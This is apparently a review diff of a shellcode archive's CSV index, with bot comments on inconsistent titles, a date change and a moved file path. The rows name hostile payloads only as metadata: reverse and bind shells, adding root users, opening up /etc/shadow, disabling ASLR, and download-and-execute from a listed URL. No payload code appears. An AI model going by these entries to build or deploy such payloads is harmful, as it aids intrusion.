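Review bot: the retitled row for 13682 still spells the call `setreud(getuid()_ getuid())`. Since the title is being rewritten here anyway, correct it to `setreuid` so a search on the syscall name finds the entry. In the same hunk the new 13703 title changes `sys_execve` to `execve` but keeps `sys_umask(14)`; use one naming convention for both calls.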
@ -357,15 +357,15 @@ id,file,description,date,author,type,platform
13712,shellcodes/linux_x86/13712.c,"Linux/x86 - Disable ASLR Security Shellcode (106 bytes)",2010-05-25,"Jonathan Salwan",shellcode,linux_x86
13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,shellcode,linux_x86
13716,shellcodes/linux_x86/13716.c,"Linux/x86 - Fork Bomb + Alphanumeric Shellcode (117 bytes)",2010-05-27,agix,shellcode,linux_x86
13719,shellcodes/windows_x86-64/13719.txt,"Windows 7 Professional SP1 x64 (FR) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13719,shellcodes/windows_x86-64/13719.txt,"Windows/x86-64 (7 Professional SP1) (French) - Beep Shellcode (39 bytes)",2010-05-28,agix,shellcode,windows_x86-64
13722,shellcodes/linux_x86/13722.c,"Linux/x86 - setuid(0) + chmod 0666 /etc/shadow + Polymorphic Shellcode (61 bytes)",2010-05-31,antrhacks,shellcode,linux_x86
13723,shellcodes/linux_x86/13723.c,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/shadow Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13723,shellcodes/linux_x86/13723.c,"Linux/x86 - chmod 0777 /etc/shadow + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13724,shellcodes/linux_x86/13724.c,"Linux/x86 - Kill All Running Process Shellcode (11 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - (sys_chmod syscall) chmod 0777 /etc/passwd Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - sys_execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - sys_setuid(0) + sys_setgid(0) + execve(_/bin/sh_) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13729,shellcodes/windows_x86-64/13729.txt,"Windows 7 x64 - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink /etc/shadow Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
13725,shellcodes/linux_x86/13725.txt,"Linux/x86 - chmod 0777 /etc/passwd + sys_chmod syscall Shellcode (39 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13726,shellcodes/linux_x86/13726.txt,"Linux/x86 - execve(_/bin/sh__ _-c__ _reboot_) Shellcode (45 bytes)",2010-05-31,gunslinger_,shellcode,linux_x86
13728,shellcodes/linux_x86/13728.c,"Linux/x86 - setuid(0) + setgid(0) + execve(/bin/sh) Shellcode (39 bytes)",2010-06-01,gunslinger_,shellcode,linux_x86
13729,shellcodes/windows_x86-64/13729.txt,"Windows/x86-64 (7) - cmd Shellcode (61 bytes)",2010-06-01,agix,shellcode,windows_x86-64
13730,shellcodes/linux_x86/13730.c,"Linux/x86 - unlink(/etc/shadow) Shellcode (33 bytes)",2010-06-02,gunslinger_,shellcode,linux_x86
13731,shellcodes/linux_x86/13731.c,"Linux/x86 - Hard Reboot Shellcode (29 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
13732,shellcodes/linux_x86/13732.c,"Linux/x86 - Hard Reboot Shellcode (33 bytes)",2010-06-03,gunslinger_,shellcode,linux_x86
13733,shellcodes/solaris/13733.c,"Solaris/x86 - SystemV killall Command Shellcode (39 bytes)",2010-06-03,"Jonathan Salwan",shellcode,solaris
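Review bot: the quote placeholders are handled inconsistently in the rows rewritten here. 13728 becomes `execve(/bin/sh)` with the `_` markers removed, while 13726 is rewritten to `execve(_/bin/sh__ _-c__ _reboot_)` with them kept. Either strip them from 13726 as well or leave both rows alone. The same applies to the `sys_` prefix: 13728 drops it from `setuid`/`setgid`, but the new 13723 and 13725 titles still carry `sys_chmod syscall`.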
@ -377,8 +377,8 @@ id,file,description,date,author,type,platform
13908,shellcodes/linux_x86-64/13908.c,"Linux/x86-64 - Disable ASLR Security Shellcode (143 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13910,shellcodes/linux_x86/13910.c,"Linux/x86 - Bind TCP (31337/TCP) Shell + setreuid(0_0) + Polymorphic Shellcode (131 bytes)",2010-06-17,gunslinger_,shellcode,linux_x86
13915,shellcodes/linux_x86-64/13915.txt,"Linux/x86-64 - setuid(0) + chmod 0777 /etc/passwd + exit(0) Shellcode (63 bytes)",2010-06-17,"Jonathan Salwan",shellcode,linux_x86-64
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{shadow_passwd} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/windows_x86/14014.pl,"Windows XP SP3 (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes)",2010-06-24,d0lc3,shellcode,windows_x86
13943,shellcodes/linux_x86-64/13943.c,"Linux/x86-64 - Add Root User (shell-storm/leet) To /etc/{passwd_shadow} Shellcode (390 bytes)",2010-06-20,"Jonathan Salwan",shellcode,linux_x86-64
14014,shellcodes/generator/14014.pl,"Windows (XP SP3) (Spanish) - URLDownloadToFileA + CreateProcessA + ExitProcess Shellcode (176+ bytes) (Generator)",2010-06-24,d0lc3,shellcode,generator
14116,shellcodes/arm/14116.txt,"Linux/ARM - setuid(0) + kill(-1_ SIGKILL) Shellcode (28 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
14052,shellcodes/windows/14052.c,"Windows - cmd.exe + ExitProcess WinExec Shellcode (195 bytes)",2010-06-25,RubberDuck,shellcode,windows
14097,shellcodes/arm/14097.c,"Linux/ARM - execve(_/bin/sh___/bin/sh__0) Shellcode (30 bytes)",2010-06-28,"Jonathan Salwan",shellcode,arm
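Review bot: the row for 14014 changes the file column from `shellcodes/windows_x86/14014.pl` to `shellcodes/generator/14014.pl` and the platform column to `generator`, but nothing in this hunk shows the file itself moving. Confirm the rename of the .pl file is part of the same commit, otherwise the index points at a path that does not exist.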
@ -389,46 +389,46 @@ id,file,description,date,author,type,platform
14190,shellcodes/arm/14190.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + XOR 88 Encoded + Polymorphic Shellcode (78 bytes)",2010-07-03,"Jonathan Salwan",shellcode,arm
14216,shellcodes/linux_x86/14216.c,"Linux/x86 - Bind TCP (64533/TCP) Shell (/bin/sh) Shellcode (97 bytes)",2010-07-05,Magnefikko,shellcode,linux_x86
14218,shellcodes/linux/14218.c,"Linux - Write SUID Root Shell (/tmp/.hiddenshell) + Polymorphic Shellcode (161 bytes)",2010-07-05,gunslinger_,shellcode,linux
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
14219,shellcodes/linux/14219.c,"Linux - setreuid(0_0) + execve(_/bin/sh__NULL_NULL) + XOR Encoded Shellcode (62 bytes)",2010-07-05,gunslinger_,shellcode,linux
14221,shellcodes/windows/14221.html,"Safari 4.0.5 < 5.0.0 (Windows XP/7) - JavaScript JITed exec calc (ASLR/DEP Bypass) + Null-Free Shellcode",2010-07-05,"Alexey Sintsov",shellcode,windows
14234,shellcodes/linux_x86/14234.c,"Linux/x86 - Bind TCP (6778/TCP) Shell + XOR Encoded + Polymorphic Shellcode (125 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
14235,shellcodes/linux_x86/14235.c,"Linux/x86 - Bind TCP (31337/TCP) Netcat Shell + Polymorphic Shellcode (91 bytes)",2010-07-05,gunslinger_,shellcode,linux_x86
14261,shellcodes/generator/14261.c,"Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) + Polymorphic Shellcode (Generator)",2010-07-07,"Jonathan Salwan",shellcode,generator
14276,shellcodes/linux_x86/14276.c,"Linux/x86 - Find All Writeable Folder In FileSystem + Polymorphic Shellcode (91 bytes)",2010-07-08,gunslinger_,shellcode,linux_x86
14288,shellcodes/windows_x86/14288.asm,"Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14288,shellcodes/windows_x86/14288.asm,"Windows/x86 - Write-to-file ('pwned' ./f.txt) + Null-Free Shellcode (278 bytes)",2010-07-09,"Brett Gervasoni",shellcode,windows_x86
14305,shellcodes/linux_x86-64/14305.c,"Linux/x86-64 - Flush IPTables Rules (execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL)) Shellcode (49 bytes)",2010-07-09,10n1z3d,shellcode,linux_x86-64
14332,shellcodes/linux_x86/14332.c,"Linux/x86 - Bind TCP (8080/TCP) Netcat (/bin/nc) Shell (/bin/sh) Shellcode (75 bytes)",2010-07-11,blake,shellcode,linux_x86
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows XP SP3 (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14691,shellcodes/linux_x86/14691.c,"Linux/x86 - execve(/bin/sh) + Polymorphic + Null-Free Shellcode (46 bytes)",2010-08-19,Aodrulez,shellcode,linux_x86
14697,shellcodes/windows/14697.c,"Windows (XP SP3) (English) - MessageBoxA Shellcode (87 bytes)",2010-08-20,"Glafkos Charalambous",shellcode,windows
14795,shellcodes/bsd_x86/14795.c,"BSD/x86 - Bind TCP (2525/TCP) Shell Shellcode (167 bytes)",2010-08-25,beosroot,shellcode,bsd_x86
14873,shellcodes/windows_x86/14873.asm,"Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-02,dijital1,shellcode,windows_x86
14873,shellcodes/windows_x86/14873.asm,"Windows/x86 - Egghunter Checksum Routine Shellcode (18 bytes)",2010-09-01,dijital1,shellcode,windows_x86
14907,shellcodes/arm/14907.c,"Linux/ARM - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (27 bytes)",2010-09-05,"Jonathan Salwan",shellcode,arm
15063,shellcodes/windows_x86/15063.c,"Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
15116,shellcodes/arm/15116.cpp,"Windows Mobile 6.5 TR (WinCE 5.2)/ARM - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
15136,shellcodes/windows/15136.cpp,"Windows Mobile 6.5 TR - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/windows_x86/15202.c,"Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15203,shellcodes/windows_x86/15203.c,"Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15063,shellcodes/windows_x86/15063.c,"Windows/x86 (XP SP3) (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes)",2010-09-20,ZoRLu,shellcode,windows_x86
15116,shellcodes/arm/15116.cpp,"Windows/ARM (Mobile 6.5 TR WinCE 5.2) - MessageBox Shellcode",2010-09-26,"Celil Ünüver",shellcode,arm
15136,shellcodes/windows/15136.cpp,"Windows/ARM (Mobile 6.5 TR) - Phone Call Shellcode",2010-09-27,"Celil Ünüver",shellcode,windows
15202,shellcodes/windows_x86/15202.c,"Windows/x86 (XP Professional SP3) (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15203,shellcodes/windows_x86/15203.c,"Windows/x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes)",2010-10-04,"Anastasios Monachos",shellcode,windows_x86
15314,shellcodes/arm/15314.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15315,shellcodes/arm/15315.asm,"Linux/ARM - Bind UDP (68/UDP) Listener + Reverse TCP (192.168.0.1:67/TCP) Shell Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15316,shellcodes/arm/15316.asm,"Linux/ARM - Bind TCP (0x1337/TCP) Listener + Receive Shellcode + Payload Loader Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15317,shellcodes/arm/15317.asm,"Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode",2010-10-26,"Daniel Godas-Lopez",shellcode,arm
15616,shellcodes/arm/15616.c,"Linux/ARM - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (151 bytes)",2010-11-25,"Jonathan Salwan",shellcode,arm
15618,shellcodes/osx/15618.c,"OSX/x86-64 - setuid() + Shell(/bin/sh) Shellcode (51 bytes)",2010-11-25,"Dustin Schultz",shellcode,osx
15712,shellcodes/generator/15712.rb,"ARM - Add Root User Shellcode (Metasploit) (66+ bytes) (Generator)",2010-12-09,"Jonathan Salwan",shellcode,generator
15879,shellcodes/windows_x86/15879.txt,"Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
15879,shellcodes/windows_x86/15879.txt,"Windows/x86 (5.0 < 7.0) - Speaking 'You got pwned!' + Null-Free Shellcode",2010-12-31,Skylined,shellcode,windows_x86
16025,shellcodes/generator/16025.c,"FreeBSD/x86 - Reverse TCP (127.0.0.1:1337/TCP) Shell (/bin/sh) Shellcode (81 bytes) (Generator)",2011-01-21,Tosh,shellcode,generator
16026,shellcodes/freebsd_x86/16026.c,"FreeBSD/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (111 bytes)",2011-01-21,Tosh,shellcode,freebsd_x86
16283,shellcodes/windows_x86/16283.txt,"Windows x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
16283,shellcodes/windows_x86/16283.txt,"Windows/x86 - Eggsearch Shellcode (33 bytes)",2011-03-05,oxff,shellcode,windows_x86
17432,shellcodes/superh_sh4/17432.c,"Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes)",2011-06-22,"Jonathan Salwan",shellcode,superh_sh4
17194,shellcodes/linux_x86/17194.txt,"Linux/x86 - Bind TCP (6666/TCP) Netcat (/usr/bin/netcat) Shell (/bin/sh) + Polymorphic + XOR Encoded Shellcode (69/93 bytes)",2011-04-21,"Jonathan Salwan",shellcode,linux_x86
17224,shellcodes/osx/17224.s,"OSX/x86-64 - Reverse TCP (FFFFFFFF:4444/TCP) Shell (/bin/sh) Shellcode (131 bytes)",2011-04-29,hammackj,shellcode,osx
17323,shellcodes/windows/17323.c,"Windows - Add Local Administrator User (RubberDuck/mudbath) + ExitProcess WinExec Shellcode (279 bytes)",2011-05-25,RubberDuck,shellcode,windows
20195,shellcodes/linux_x86/20195.c,"Linux/x86 - Disable ASLR Security Shellcode (83 bytes)",2012-08-02,"Jean Pascal Pereira",shellcode,linux_x86
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS (IPv6) Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17326,shellcodes/generator/17326.rb,"Windows - Download File + Execute via DNS + IPv6 Shellcode (Generator) (Metasploit)",2011-05-26,"Alexey Sintsov",shellcode,generator
17371,shellcodes/linux_x86/17371.c,"Linux/x86 - Reverse TCP (localhost:8080/TCP) Shell + SSL Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",shellcode,linux_x86
17439,shellcodes/superh_sh4/17439.c,"Linux/SuperH (sh4) - Add Root User (shell-storm/toor) To /etc/passwd Shellcode (143 bytes)",2011-06-23,"Jonathan Salwan",shellcode,superh_sh4
17545,shellcodes/windows_x86/17545.txt,"Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
17545,shellcodes/windows_x86/17545.txt,"Windows/x86 (PerfectXp-pc1/SP3 ) (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes)",2011-07-18,KaHPeSeSe,shellcode,windows_x86
17559,shellcodes/linux_x86/17559.c,"Linux/x86 - Egghunter + Null-Free Shellcode (29 bytes)",2011-07-21,"Ali Raheem",shellcode,linux_x86
17564,shellcodes/osx/17564.asm,"OSX/x86-64 - Universal ROP + Reverse TCP Shell Shellcode",2011-07-24,pa_kt,shellcode,osx
17940,shellcodes/linux_mips/17940.c,"Linux/MIPS - execve(/bin/sh) Shellcode (52 bytes)",2011-10-07,entropy,shellcode,linux_mips
17996,shellcodes/generator/17996.c,"Linux/MIPS - XOR Encoder Shellcode (60 bytes) (Generator)",2011-10-18,entropy,shellcode,generator
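Review bot: the 14873 row changes its date from 2010-09-02 to 2010-09-01 in what is otherwise a title-only rename (`Windows x86` to `Windows/x86`). If the date correction is intended it deserves a mention in the commit message; if not, restore the original value. Two smaller points in this hunk: the new 17545 title has a stray space inside the parentheses, `(PerfectXp-pc1/SP3 )`, and 15136 is retitled `Windows/ARM (Mobile 6.5 TR)` while its path and platform columns stay `shellcodes/windows` and `windows`, unlike 15116, which sits under `arm`.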
@ -438,7 +438,7 @@ id,file,description,date,author,type,platform
18197,shellcodes/linux_x86-64/18197.c,"Linux/x86-64 - execve(/bin/sh) Shellcode (52 bytes)",2011-12-03,X-h4ck,shellcode,linux_x86-64
18226,shellcodes/linux_mips/18226.c,"Linux/MIPS - Reverse TCP (0x7a69/TCP) Shell Shellcode (168 bytes)",2011-12-10,rigan,shellcode,linux_mips
18227,shellcodes/linux_mips/18227.c,"Linux/MIPS - reboot() Shellcode (32 bytes)",2011-12-10,rigan,shellcode,linux_mips
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18294,shellcodes/linux_x86/18294.c,"Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd + No Password + Polymorphic Shellcode",2011-12-31,pentesters.ir,shellcode,linux_x86
18379,shellcodes/linux_x86/18379.c,"Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes)",2012-01-17,rigan,shellcode,linux_x86
18585,shellcodes/linux_x86-64/18585.s,"Linux/x86-64 - Add Root User (t0r/Winner) To /etc/passwd Shellcode (189 bytes)",2012-03-12,0_o,shellcode,linux_x86-64
18885,shellcodes/linux_x86/18885.c,"Linux/x86 - execve(/bin/dash) Shellcode (42 bytes)",2012-05-16,X-h4ck,shellcode,linux_x86
@ -446,54 +446,54 @@ id,file,description,date,author,type,platform
21252,shellcodes/arm/21252.asm,"Linux/ARM (Raspberry Pi) - Reverse TCP (10.1.1.2:0x1337/TCP) Shell (/bin/sh) Shellcode (72 bytes)",2012-09-11,midnitesnake,shellcode,arm
21253,shellcodes/arm/21253.asm,"Linux/ARM (Raspberry Pi) - execve(_/bin/sh__ [0]_ [0 vars]) Shellcode (30 bytes)",2012-09-11,midnitesnake,shellcode,arm
21254,shellcodes/arm/21254.asm,"Linux/ARM (Raspberry Pi) - chmod 0777 /etc/shadow Shellcode (41 bytes)",2012-09-11,midnitesnake,shellcode,arm
40363,shellcodes/windows_x86/40363.c,"Windows x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows XP Professional SP3 - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows x64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
40363,shellcodes/windows_x86/40363.c,"Windows/x86 - Bind TCP Shell + Password (damn_it!$$##@;*#) Shellcode (637 bytes)",2016-09-13,"Roziul Hasan Khan Shifat",shellcode,windows_x86
22489,shellcodes/windows/22489.cpp,"Windows (XP Professional SP3) - calc.exe (C:/WINDOWS/system32/calc.exe) ROP Shellcode (428 bytes)",2012-11-05,b33f,shellcode,windows
40890,shellcodes/windows_x86-64/40890.c,"Windows/x86-64 - Bind TCP (4444/TCP) Shell Shellcode (508 bytes)",2016-12-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
23622,shellcodes/linux_x86/23622.c,"Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes)",2012-12-24,"Hamza Megahed",shellcode,linux_x86
24318,shellcodes/windows/24318.c,"Windows (2000/XP/7 x64/x86) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
24318,shellcodes/windows/24318.c,"Windows/x86-64 / x86 (2000/XP/7) - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode",2013-01-24,RubberDuck,shellcode,windows
25497,shellcodes/linux_x86/25497.c,"Linux/x86 - Reverse TCP (192.168.1.10:31337/TCP) Shell Shellcode (92 bytes)",2013-05-17,"Russell Willis",shellcode,linux_x86
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - Authentication Bypass _EXTRABACON_ (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
40387,shellcodes/hardware/40387.nasm,"Cisco ASA - 'EXTRABACON' Authentication Bypass (Improved Shellcode) (69 bytes)",2016-09-16,"Sean Dillon",shellcode,hardware
27132,shellcodes/linux_mips/27132.txt,"Linux/MIPS (Little Endian) - system() Shellcode (80 bytes)",2013-07-27,"Jacob Holcomb",shellcode,linux_mips
27180,shellcodes/arm/27180.asm,"Windows RT ARM - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
27180,shellcodes/arm/27180.asm,"Windows/ARM (RT) - Bind TCP (4444/TCP) Shell Shellcode",2013-07-28,"Matthew Graeber",shellcode,arm
40827,shellcodes/linux_x86/40827.c,"Linux/x86 - Egghunter (0x56767606) Using fstenv + Obfuscation Shellcode (31 bytes)",2016-11-25,"Filippo Bersani",shellcode,linux_x86
28474,shellcodes/linux_x86/28474.c,"Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP (192.168.122.1:43981/TCP) Shell (/bin/sh) Shellcode",2013-09-23,"Ryan Fenno",shellcode,linux_x86
40334,shellcodes/windows_x86/40334.c,"Windows x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28996,shellcodes/windows/28996.c,"Windows - MessageBox Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
40334,shellcodes/windows_x86/40334.c,"Windows/x86 - Reverse TCP (192.168.232.129:4444/TCP) Shell + Persistent Access Shellcode (494 bytes)",2016-09-05,"Roziul Hasan Khan Shifat",shellcode,windows_x86
28996,shellcodes/windows/28996.c,"Windows - MessageBox + Null-Free Shellcode (113 bytes)",2013-10-16,"Giuseppe D'Amore",shellcode,windows
29436,shellcodes/linux_mips/29436.asm,"Linux/MIPS (Little Endian) - Reverse TCP (192.168.1.177:31337/TCP) Shell (/bin/sh) Shellcode (200 bytes)",2013-11-04,"Jacob Holcomb",shellcode,linux_mips
40352,shellcodes/windows_x86/40352.c,"Windows 7 x86 - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
40352,shellcodes/windows_x86/40352.c,"Windows/x86 (7) - Bind TCP (4444/TCP) Shell Shellcode (357 bytes)",2016-09-08,"Roziul Hasan Khan Shifat",shellcode,windows_x86
33836,shellcodes/windows/33836.txt,"Windows - Add Administrator User (BroK3n/BroK3n) + Null-Free Shellcode (194 bytes)",2014-06-22,"Giuseppe D'Amore",shellcode,windows
34060,shellcodes/linux_x86/34060.c,"Linux/x86 - execve(/bin/sh) + Socket Re-Use Shellcode (50 bytes)",2014-07-14,ZadYree,shellcode,linux_x86
34262,shellcodes/linux_x86/34262.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + Execute /bin/sh Shellcode (378 bytes)",2014-08-04,"Ali Razmjoo",shellcode,linux_x86
34592,shellcodes/linux_x86/34592.c,"Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) To /etc/passwd + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes)",2014-09-09,"Ali Razmjoo",shellcode,linux_x86
34667,shellcodes/linux_x86-64/34667.c,"Linux/x86-64 - Reverse TCP (127.1.1.1:6969/TCP) Shell (/bin/bash) Shellcode (139 bytes)",2014-09-15,MadMouse,shellcode,linux_x86-64
34778,shellcodes/linux_x86/34778.c,"Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes)",2014-09-25,"Javier Tejedor",shellcode,linux_x86
35205,shellcodes/linux_x86-64/35205.txt,"Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) + Position Independent + Alphanumeric Shellcode (87 bytes)",2014-11-10,Breaking.Technology,shellcode,linux_x86-64
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35519,shellcodes/linux_x86/35519.txt,"Linux/x86 - rmdir() Shellcode (37 bytes)",2014-12-11,kw4,shellcode,linux_x86
35586,shellcodes/linux_x86-64/35586.c,"Linux/x86-64 - Bind TCP (4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free Shellcode (81/96 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35587,shellcodes/linux_x86-64/35587.c,"Linux/x86-64 - Reverse TCP (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (Z~r0) + Null-Free + Null-Mask Shellcode (77-85/90-98 bytes)",2014-12-22,"Sean Dillon",shellcode,linux_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35793,shellcodes/windows_x86/35793.txt,"Windows/x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86
35794,shellcodes/windows_x86-64/35794.txt,"Windows/x86-64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service + Obfuscated Shellcode (1218 bytes)",2015-01-13,"Ali Razmjoo",shellcode,windows_x86-64
35868,shellcodes/linux_mips/35868.c,"Linux/MIPS - execve(/bin/sh) Shellcode (36 bytes)",2015-01-22,Sanguine,shellcode,linux_mips
36411,shellcodes/generator/36411.txt,"Windows XP x86-64 - Download File + Execute Shellcode (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36411,shellcodes/generator/36411.txt,"Windows/x86-64 (XP) - Download File + Execute Shellcode Using Powershell (Generator)",2015-03-16,"Ali Razmjoo",shellcode,generator
36274,shellcodes/linux_mips/36274.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
36276,shellcodes/linux_mips/36276.c,"Linux/MIPS (Little Endian) - chmod 666 /etc/passwd Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",shellcode,linux_mips
